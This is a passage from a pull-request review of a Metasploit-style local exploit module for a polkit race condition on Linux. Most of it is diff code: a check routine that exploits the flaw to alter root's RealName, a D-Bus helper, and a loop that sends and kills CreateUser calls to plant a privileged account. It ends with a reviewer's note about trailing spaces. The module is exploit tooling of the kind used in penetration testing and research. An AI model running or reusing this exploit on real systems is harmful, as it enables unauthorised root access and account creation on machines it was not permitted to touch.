modules/exploits/linux/local/polkit_priv_esc.rb

```diff
@@ -0,0 +1,254 @@
+          org.freedesktop.DBus.Properties.Get
+          string:org.freedesktop.Accounts.User
+          string:RealName
+        | grep "string \\"#{new_realname}\\"";
+        if [ $? -eq 0 ]; then
+          echo success;
+          break;
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def check
+    unless cmd_exec('pkexec --version') =~ /pkexec version (\d+\S*)/
+      return CheckCode::Safe('The polkit framework is not installed')
+    end
+
+    # The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To
+    # do that, the distro specific package manager would need to be queried.
+    status = CheckCode::Detected("Detected polkit framework version #{Regexp.last_match(1)}.")
+
+    if !is_root? && command_exists?('dbus-send')
+      # This is required to make the /org/freedesktop/Accounts/User0 object_path available.
+      dbus_method_call('/org/freedesktop/Accounts', 'org.freedesktop.Accounts.FindUserByName', 'root')
+      # Check for the presence of the vulnerability be exploiting it to set the root user's RealName property to a
+      # random string before restoring it.
+      result = dbus_method_call('/org/freedesktop/Accounts/User0', 'org.freedesktop.DBus.Properties.Get', 'org.freedesktop.Accounts.User', 'RealName')
+      if result =~ /variant\s+string\s+"(.*)"/
+        old_realname = Regexp.last_match(1)
+        if exploit_set_realname(rand_text_alphanumeric(12))
+          status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
+          unless exploit_set_realname(old_realname)
+            print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
+          end
+        end
+      end
+    end
+
+    status
+  end
+
+  def dbus_method_call(object_path, interface_member, *args)
+    cmd_args = %w[dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply]
+    cmd_args << object_path
+    cmd_args << interface_member
+    args.each do |arg|
+      if arg.is_a? Integer
+        cmd_args << "int32:#{arg}"
+      elsif arg.is_a? String
+        cmd_args << "string:'#{arg}'"
+      end
+    end
+
+    cmd = cmd_args.join(' ')
+    vprint_status("Running: #{cmd}")
+    cmd_exec(cmd)
+  end
+
+  def create_unix_crypt_hash
+    UnixCrypt::SHA256.build(datastore['PASSWORD'].to_s)
+  end
+
+  def exploit_set_username
+    cmd_exec(<<~SCRIPT
+      for i in {1..#{datastore['ITERATIONS']}}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts
+          org.freedesktop.Accounts.CreateUser
+          string:#{datastore['USERNAME']}#{' '}
+          string:\"#{datastore['USERNAME']}\"#{' '}
+          int32:1 &
+        sleep #{datastore['CMDDELAY']}s;
+        kill $!;
+        if id #{datastore['USERNAME']}; then#{' '}
```

Comment:
Just verifying if the extra spaces at the end are needed 👀 

```suggestion
        if id #{datastore['USERNAME']}; then
```